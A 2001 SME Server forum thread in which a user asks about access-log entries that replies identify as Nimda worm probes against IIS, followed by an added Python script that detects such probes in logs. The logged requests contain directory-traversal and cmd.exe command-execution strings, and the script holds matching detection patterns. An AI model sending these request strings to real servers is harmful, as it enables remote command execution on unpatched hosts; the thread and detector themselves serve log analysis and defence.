Koozali.org: home of the SME Server
Legacy Forums => Experienced User Forum => Topic started by: Gert Andersen on November 27, 2001, 11:53:18 AM
-
Hi
I have these entries in my access-log. Could someone please interpret these lines? I have a lot of these entries.
Thanks
--------------------------------------------------------------------
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:13 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:15 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:16 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:17 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:19 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:20 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
-
I can't help you much, but it seems like an IIS worm is trying to do some stuff :)
> GET /c/winnt/system32/cmd.exe?/c+dir
Don't worry, Apache is untouchable!
Cya
-
It's the Nimda worm. As WXP has said, it only affects unpatched Microsoft IIS servers.
Apart from being a waste of bandwidth and log space, it is harmless.
Jon
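
Added example, not part of the original thread: a small Python check that groups requests like the ones pasted above by client and reports whether any of them was answered with something other than an error. The host name, the client addresses and the signature labels are constructed for this example; the request paths are the ones in the question.

```python
import re
from collections import defaultdict

# Layout of the pasted lines: vhost client ident user [time] "request" status size ...
# The " ?-" tolerates the ident "-" being fused to the client address, as in the post.
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+?) ?- \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Request-path traits visible in the thread's log lines (labels are this example's own).
SIGNATURES = {
    "root.exe probe": re.compile(r"/root\.exe", re.I),
    "cmd.exe probe": re.compile(r"/cmd\.exe", re.I),
    "double-encoded traversal": re.compile(r"\.\.%25[0-9a-f]{2}", re.I),      # ..%255c
    "malformed UTF-8 traversal": re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I),  # ..%c1%1c
}

def classify(target):
    """Return the names of every signature the request target matches."""
    return [name for name, rx in SIGNATURES.items() if rx.search(target)]

def summarize(lines):
    """Group probe requests by client; record any that got a 2xx answer."""
    report = defaultdict(lambda: {"probes": 0, "kinds": set(), "served": []})
    for line in lines:
        m = LINE_RE.match(line)
        kinds = classify(m["target"]) if m else []
        if not kinds:
            continue
        entry = report[m["client"]]
        entry["probes"] += 1
        entry["kinds"].update(kinds)
        if m["status"].startswith("2"):  # a 2xx answer means something was served
            entry["served"].append(m["target"])
    return dict(report)

# Constructed sample: paths from the thread, documentation addresses and host name.
TS = "[27/Nov/2001:09:41:13 +0100]"
SAMPLE = [
    f'www.example.com 192.0.2.10 - - {TS} "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"',
    f'www.example.com 192.0.2.10- - {TS} "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"',
    f'www.example.com 192.0.2.10 - - {TS} "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"',
    f'www.example.com 192.0.2.10 - - {TS} "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"',
    f'www.example.com 198.51.100.7 - - {TS} "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for client, e in summarize(SAMPLE).items():
        print(client, e["probes"], sorted(e["kinds"]), "served:", e["served"] or "none")
```

An empty `served` list for a client corresponds to the situation in the thread, where every probe was answered with 404.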